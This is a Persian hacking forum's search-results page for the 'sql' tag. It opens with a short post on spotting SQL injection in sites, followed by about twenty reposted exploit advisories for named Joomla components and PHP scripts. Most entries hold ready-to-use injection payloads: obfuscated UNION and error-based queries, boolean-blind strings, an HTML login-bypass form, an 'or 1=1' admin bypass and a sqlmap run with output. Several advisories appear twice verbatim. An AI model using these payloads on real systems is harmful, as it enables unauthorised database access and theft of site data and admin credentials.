رفتن به مطلب

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'sql'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • AnonySec
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پروژه های شرکت
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

93 نتیجه پیدا شد

  1. Hacking-Bugs

    باگ sql یا همان sql injection این باگ در سال 2012 شناسایی شده است این باگ یکی از خطاهای بزرگ برنامه نویسی میباشد . اغلب یا هکر وقتی اگر بخواهد به سایت مقابل حمله نمایید اول به دیتابیس سایت نفوذ میکنه بعد از نفوذ رمز و یوزر نیم صفحه ادمین را یافته و سایت را دیفیس مینمایید. برای فهمیدن و شناسایی این باگ کافیست سایت خود را با اسکنر های متفاوت اسکن کنید از جمله vega - acuntix این دو یکی از قوی ترین اسکنر های موجود در زمینه هک میباشند. به سایت خودتان به خوب نگاه کنید اگر دروک زید در اخر سایت تان بود یعنی سایت دارای باگ sql میباشد index.php?id=10 یا اگر نبود با گذاشتن ' به اخر سایت اگر سایت ارور داد یعنی دارای باگ sql میباشد اگر وارد شد یعنی باگ sql ندارد . با تشکز
  2. Hacking

    # # # # # # Exploit Title: Joomla! Component JBuildozer 1.4.1 - SQL Injection # Dork: N/A # Date: 12.12.2017 # Vendor Homepage: http://jbuildozer.com/ # Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/content-construction/jbuildozer/ # Version: 1.4.1 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/index.php?option=com_jbuildozer&view=entriessearch&tmpl=component&mode=module&tpl=3&appid=[SQL] # # 1%20%20%2f*!05555Procedure*%2f%20%2f*!05555Analyse*%2f%20%28extractvalue(0%2c%2f*!05555concat*%2f%280x27,0x496873616e2053656e63616e,0x3a,@@version%29%29,0%29%2d%2d%20%2d # # http://server/index.php?option=com_jbuildozer&view=entriessearch&tmpl=component&mode=module&tpl=3&appid=1%20%20%2f*!05555Procedure*%2f%20%2f*!05555Analyse*%2f%20%28extractvalue(0%2c%2f*!05555concat*%2f%280x27,0x496873616e2053656e63616e,0x3a,@@version%29%29,0%29%2d%2d%20%2d # # # # # #
  3. Hacking

    <!-- # # # # # # Exploit Title: Bus Booking Script 1.0 - SQL Injection # Dork: N/A # Date: 13.12.2017 # Vendor Homepage: http://www.phpautoclassifiedscript.com/ # Software Link: http://www.phpautoclassifiedscript.com/bus-booking-script.html # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2017-17645 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: --> <html> <body> <form action="http://localhost/newbusbooking/admin/index.php" method="post" enctype="application/x-www-form-urlencoded" name="frmlogin" target="_self"> <input name="txtname" type="text" value="' UNION ALL SELECT 0x31,0x564552204159415249,0x33,0x34,0x35-- Ver Ayari"></div> <input name="logbut" id="logbut" type="submit"></div> </form> </body> </html>
  4. Hacking

    # # # # # # Exploit Title: Piwigo <= 2.9.1 - 'cat_true'/'cat_false' SQL Injection # Dork: N/A # Date: 12.12.2017 # Vendor Homepage: http://piwigo.org/ # Software Link: http://piwigo.org/basics/downloads # Version: <= 2.9.1 # Category: Webapps # Tested on: WiN7_x64/WIN10_X64 # CVE: CVE-2017-10682 # # # # # # Exploit Author: Akityo # Email: [email protected] # # # # # # Description: # # SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter # in the comments or status page to cat_options.php. # # # # # # # # Proof-of-Concent: # # POST /[path]/admin.php?page=cat_options&section=status HTTP/1.1 # Host: www.test.com # Content-Length: 34 # Cache-Control: max-age=0 # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 # Upgrade-Insecure-Requests: 1 # User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 # Content-Type: application/x-www-form-urlencoded # Accept-Encoding: gzip, deflate # Accept-Language: zh-CN,zh;q=0.8 # Cookie: null # Connection: close # # cat_false%5B%5D=[payload here]&trueify=%C2%AB # # # # # # #
  5. Hacking

    # # # # # # Exploit Title: Cells Blog 3.5 - SQL Injection # Dork: N/A # Date: 16.12.2017 # Vendor Homepage: http://www.cells.tw/ # Software Link: http://www.cells.tw/cells/ # Version: 3.5 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/pub_post.php?bgid=[SQL]&fmid=[SQL] # # -7+UNION%20SELECT+0x253331%2c0x253332%2c0x253333%2c0x253334%2c0x253335%2c0x253336%2c0x253337%2c0x253338%2c%39%2c0x253331253330%2c0x253331253331%2c0x253331253332%2c0x253331253333%2c0x253331253334%2c0x253331253335%2c0x253331253336%2c0x253331253337%2c0x253331253338%2c0x253331253339%2d%2d%20%2d # # Parameter: bgid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=1 AND 9841=9841&fmid=7 # # Parameter: fmid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=1&fmid=7 AND 2056=2056 # 2) # http://localhost/[PATH]/pub_openpic.php?bgid=[SQL]&fmid=[SQL]&fnid=[SQL] # # Parameter: fnid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=2&fmid=10&fnid=12 AND 1592=1592 # # Parameter: fmid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=2&fmid=10 AND 3227=3227&fnid=12 # # Parameter: bgid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=2 AND 6608=6608&fmid=10&fnid=12 # # 3) # http://localhost/[PATH]/album.php?bgid=[SQL]&fmid=[SQL] # # Parameter: fmid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=2&fmid=10 AND 9273=9273 # # Parameter: bgid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=2 AND 9536=9536&fmid=10 # # 4) # http://localhost/[PATH]/fourm.php?bgid=[SQL]&fmid=[SQL] # # Parameter: fmid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=1&fmid=2 AND 5699=5699 # # Parameter: bgid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=1 AND 9899=9899&fmid=2 # # # # # #
  6. Hacking

    # # # # # # Exploit Title: Joomla! Component Guru Pro 'promocode'- SQL Injection # Dork: N/A # Date: 17.12.2017 # Vendor Homepage: https://www.ijoomla.com/ # Software Link: https://www.ijoomla.com/component/digistore/products/47-joomla-add-ons/119-guru-pro/189?Itemid=189 # Version: N/A # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/guruBuy?promocode=[SQL] # # '%20/*!50000Procedure*/%20/*!50000Analyse*/%20(extractvalue(0%2c/*!50000concat*/(0x27%2c0x496873616e2053656e63616e%2c0x3a%[email protected]@version))%2c0)%2d%2d%200x2d # # # # # #
  7. # # # # # # Exploit Title: Joomla! Component NextGen Editor 2.1.0 - SQL Injection # Dork: N/A # Date: 19.12.2017 # Vendor Homepage: hhttp://nextgeneditor.com/ # Software Link: https://extensions.joomla.org/extension/nextgen-editor/ # Software Download: http://nextgeneditor.com/index.php/en/testcategory/send/2-nge-editor-full/33-nextgeneditor-full-free # Version: 2.1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/index.php?option=com_nge&view=config&plname=[SQL] # # %22%20%20%2f%2a%21%30%37%37%37%37%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%30%37%37%37%37%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%2800%2c%2f%2a%21%30%37%37%37%37%63%6f%6e%63%61%74%2a%2f%280x27%2c0x496873616e2053656e63616e%2c0x3a%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c0%29%2d%2d%20%2d # # # # # #
  8. Hacking

    # # # # # # Exploit Title: Matrimonial Script - SQL Injection # Dork: N/A # Date: 22.08.2017 # Vendor Homepage: http://www.scubez.net/ # Software Link: http://www.mscript.in/ # Demo: http://www.mscript.in/matrimonial-demo.html # Version: N/A # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/viewprofile.php?id=[SQL] # # -MUS00053'+/*!11100uNiOn*/(/*!11100sElEct*/0x283129,0x3c48313e494853414e2053454e43414e3c2f48313e,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629,0x28343729,0x28343829,0x28343929,0x28353029,0x28353129,0x28353229,0x28353329,0x28353429,0x28353529,0x28353629,0x28353729,0x28353829,0x28353929,0x28363029,0x28363129,0x28363229,0x28363329,0x28363429,0x28363529,0x28363629,0x28363729,0x28363829,0x28363929,0x28373029,0x28373129,0x28373229,0x28373329,0x28373429,0x28373529,0x28373629,0x28373729,0x28373829,0x28373929,0x28383029,0x28383129,0x28383229,0x28383329,0x28383429,0x28383529,0x28383629,0x28383729,0x28383829,0x28383929,0x28393029,0x28393129,0x28393229,0x28393329,0x28393429,0x28393529,0x28393629,0x28393729,0x28393829,0x28393929,0x2831303029,0x2831303129,0x2831303229,0x2831303329,0x2831303429,0x2831303529,0x2831303629,0x2831303729,0x2831303829,0x2831303929,0x2831313029,0x2831313129,0x2831313229,0x2831313329,0x2831313429,0x2831313529,0x2831313629,0x2831313729,0x2831313829,0x2831313929,0x2831323029,0x2831323129,0x2831323229,0x2831323329,0x2831323429,0x2831323529,0x2831323629,0x2831323729,0x2831323829,0x2831323929,0x2831333029,0x2831333129,0x2831333229,0x2831333329,0x2831333429,0x2831333529,0x2831333629,0x2831333729,0x2831333829,0x2831333929,0x2831343029,0x2831343129,0x2831343229,0x2831343329,0x2831343429,0x2831343529,0x2831343629,0x2831343729,0x2831343829,0x2831343929,0x2831353029,0x2831353129,0x2831353229,0x2831353329,0x2831353429,0x2831353529,0x2831353629,0x2831353729,0x2831353829,0x2831353929,0x2831363029,0x2831363129,0x2831363229,0x2831363329,0x2831363429,0x2831363529,0x2831363629,0x2831363729,0x2831363829,0x2831363929,0x2831373029,0x2831373129,0x2831373229,0x2831373329,0x2831373429,0x2831373529,0x2831373629,0x2831373729,0x2831373829,0x2831373929,0x2831383029,0x2831383129,/*!50000dataBase*/(),0x2831383329)--+- # # http://localhost/[PATH]/load_caste_state_city.php?list_type=caste&&parent_id=[SQL] # # -1+/*!22255union*/+/*!22255+sElEct*/+0x31,(/*!22255+sElEct*/+eXpoRt_Set(5,@:=0,(/*!22255+sElEct*/+count(*)fROm(iNformatiOn_sChemA.colUmns)/*!22255where*/@:=eXpoRt_Set(5,eXpoRt_Set(5,@,table_name,0x3c6c693e,2),cOlumN_naMe,0xa3a,2)),@,2)),0x33--+- # # http://localhost/[PATH]/printprofile.php?id=[SQL] # http://localhost/[PATH]/viewphoto.php?id=[SQL] # http://localhost/[PATH]/advsearch_results.php?gender=[SQL] # http://localhost/[PATH]/advsearch_results.php?age1=[SQL] # http://localhost/[PATH]/advsearch_results.php?age2=[SQL] # http://localhost/[PATH]/advsearch_results.php?religion=[SQL] # http://localhost/[PATH]/advsearch_results.php?caste=[SQL] # http://localhost/[PATH]/advsearch_results.php?ms=[SQL] # http://localhost/[PATH]/advsearch_results.php?language=[SQL] # http://localhost/[PATH]/advsearch_results.php?edu=[SQL] # http://localhost/[PATH]/advsearch_results.php?occu=[SQL] # http://localhost/[PATH]/advsearch_results.php?country=[SQL] # # Etc.. # # # # #
  9. # # # # # # Exploit Title: Joomla! Component Price Alert 3.0.2 - SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: https://www.weborange.eu/ # Software Link: https://extensions.joomla.org/extensions/extension/extension-specific/virtuemart-extensions/price-alert/ # Demo: https://www.weborange.eu/extensions/index.php/extensions-vm3/price-alert-detail # Version: 3.0.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php?option=com_price_alert&view=subscribeajax&task=pricealert_ajax&product_id=[SQL] # # 64+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1 # # Etc.. # # # # #
  10. # # # # # # Exploit Title: Joomla! Component Bargain Product VM3 1.0 - SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: https://www.weborange.eu/ # Software Link: https://www.weborange.eu/extensions/index.php/extensions-vm3/bargain-product-vm3-detail # Demo: http://www.weborange.eu/demo/index.php/bargain-product # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=brainy&product_id=[SQL] # http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=alice&product_id=[SQL] # # 17+OR+0x3231323232+/*!00005Group*/+BY+/*!00005ConcAT_WS*/(0x3a,0x496873616e2053656e63616e,VersioN(),FLooR(RaND(0)*0x32))+/*!00005havinG*/+min(0)+OR+0x31 # # Etc.. # # # # #
  11. Hacking

    # # # # # # Exploit Title: Joomla! Component OSDownloads 1.7.4 - SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: https://joomlashack.com/ # Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/downloads/osdownloads/ # Demo: https://demoextensions.joomlashack.com/osdownloads # Version: 1.7.4 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php?option=com_osdownloads&view=item&id=[SQL] # # 8+aND(/*!22200sELeCT*/+0x30783331+/*!22200FrOM*/+(/*!22200SeLeCT*/+cOUNT(*),/*!22200CoNCaT*/((sELEcT(sELECT+/*!22200CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1 # # Etc.. # # # # #
  12. Hacking

    # # # Exploit Title: Auto Car - Car listing Script 1.1 - SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor: http://kamleshyadav.com/ # Software Link: https://codecanyon.net/item/auto-car-car-listing-script/19221368 # Demo: http://kamleshyadav.com/scripts/autocar_preview/ # Version: 1.1 # Tested on: WiN10_X64 # Exploit Author: Bora Bozdogan # Author WebSite : http://borabozdogan.net.tr # Author E-mail : [email protected] # # # POC: # # http://localhost/[PATH]/search-cars?category=[SQL] # ts_user # user_uname # user_fname # user_lname # user_email # user_pwd # #
  13. Hacking

    # # # # # # Exploit Title: Joomla! Component Photo Contest 1.0.2- SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: http://keenitsolution.com/ # Software Link: https://codecanyon.net/item/photo-contest-joomla-extension/13268866 # Demo: http://photo.keenitsolution.com/ # Version: 1.0.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/photo-contest/photocontest/vote?controller=photocontest&vid=[SQL] # # 1'aND+(/*!22200sEleCT*/+1+/*!22200FrOM*/+(/*!22200sEleCT*/+cOUNT(*),/*!22200CoNCAt*/((/*!22200sEleCT*/(/*!22200sEleCT*/+/*!22200CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!22200FrOM*/+infOrMation_schEma.tables+where+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!22200FrOM*/+infOrMation_schEma.tABLES+/*!22200gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  14. Hacking

    # # # # # # Exploit Title: Joomla! Component RPC - Responsive Portfolio 1.6.1 - SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: https://extro.media/ # Software Link: https://extensions.joomla.org/extension/rpc-responsive-portfolio/ # Demo: https://demo.extro.media/responsive-joomla-extensions-en/video-en # Version: 1.6.1 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php?option=com_pofos&view=pofo&id=[SQL] # # Etc.. # # # # #
  15. Hacking

    # # # # # # Exploit Title: Smart Chat - PHP Script 1.0.0 - Authentication Bypass # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://codesgit.com/ # Software Link: https://www.codester.com/items/997/smart-chat-php-script # Demo: http://demos.codesgit.com/smartchat/ # Version: 1.0.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin.php # User: 'or 1=1 or ''=' Pass: anything # # http://localhost/[PATH]/index.php?p=smiles&handel=[SQL] # # '+/*!11112UniOn*/+/*!11112sELeCT*/+0x31,0x32,/*!11112coNcAT_Ws*/(0x7e,/*!11112usER*/(),/*!11112DatAbASe*/(),/*!11112vErsIoN*/())--+- # # Etc... # # # # #
  16. Hacking

    # # # # # # Exploit Title: FTP Made Easy PRO 1.2 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/ftp-made-easy-pro-php-multiple-ftp-manager-client-with-code-editor/17460747 # Demo: http://codecanyon.nelliwinne.net/FTPMadeEasyPRO/ # Version: 1.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin-ftp-del.php?id=[SQL] # http://localhost/[PATH]/admin-ftp-change.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  17. Hacking

    # # # # # # Exploit Title: Easy Web Search 4.0 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/easy-web-search-php-search-engine-with-image-search-and-crawling-system/17574164 # Demo: http://codecanyon.nelliwinne.net/EasyWebSearch/ # Version: 4.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin/admin-delete.php?id=[SQL] # http://localhost/[PATH]/admin/admin-spidermode.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  18. Hacking

    # # # # # # Exploit Title: Smart Chat - PHP Script 1.0.0 - Authentication Bypass # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://codesgit.com/ # Software Link: https://www.codester.com/items/997/smart-chat-php-script # Demo: http://demos.codesgit.com/smartchat/ # Version: 1.0.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin.php # User: 'or 1=1 or ''=' Pass: anything # # http://localhost/[PATH]/index.php?p=smiles&handel=[SQL] # # '+/*!11112UniOn*/+/*!11112sELeCT*/+0x31,0x32,/*!11112coNcAT_Ws*/(0x7e,/*!11112usER*/(),/*!11112DatAbASe*/(),/*!11112vErsIoN*/())--+- # # Etc... # # # # #
  19. Hacking

    # # # # # # Exploit Title: FTP Made Easy PRO 1.2 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/ftp-made-easy-pro-php-multiple-ftp-manager-client-with-code-editor/17460747 # Demo: http://codecanyon.nelliwinne.net/FTPMadeEasyPRO/ # Version: 1.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin-ftp-del.php?id=[SQL] # http://localhost/[PATH]/admin-ftp-change.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  20. Hacking

    # # # # # # Exploit Title: Easy Web Search 4.0 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/easy-web-search-php-search-engine-with-image-search-and-crawling-system/17574164 # Demo: http://codecanyon.nelliwinne.net/EasyWebSearch/ # Version: 4.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin/admin-delete.php?id=[SQL] # http://localhost/[PATH]/admin/admin-spidermode.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  21. # Exploit Title Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6 # Date: 2016-09-16 # Exploit Author: Larry W. Cashdollar, @_larry0 # Vendor Homepage: http://huge-it.com/joomla-portfolio-gallery/ # Software Link: # Version: 1.0.6 # Tested on: Linux # CVE : CVE-2016-1000124 # Advisory: http://www.vapidlabs.com/advisory.php?v=170 # Exploit: • $ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2" • • • (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] • sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests: • --- • Parameter: #1* ((custom) POST) • Type: error-based • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) • Payload: page=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2 • • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2 • --- • [13:30:39] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Debian 8.0 (jessie) • web application technology: Apache 2.4.10 • back-end DBMS: MySQL >= 5.0.12 • [13:30:39] [WARNING] HTTP error codes detected during run: • 500 (Internal Server Error) - 2715 times • [13:30:39] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4' • • [*] shutting down at 13:30:39
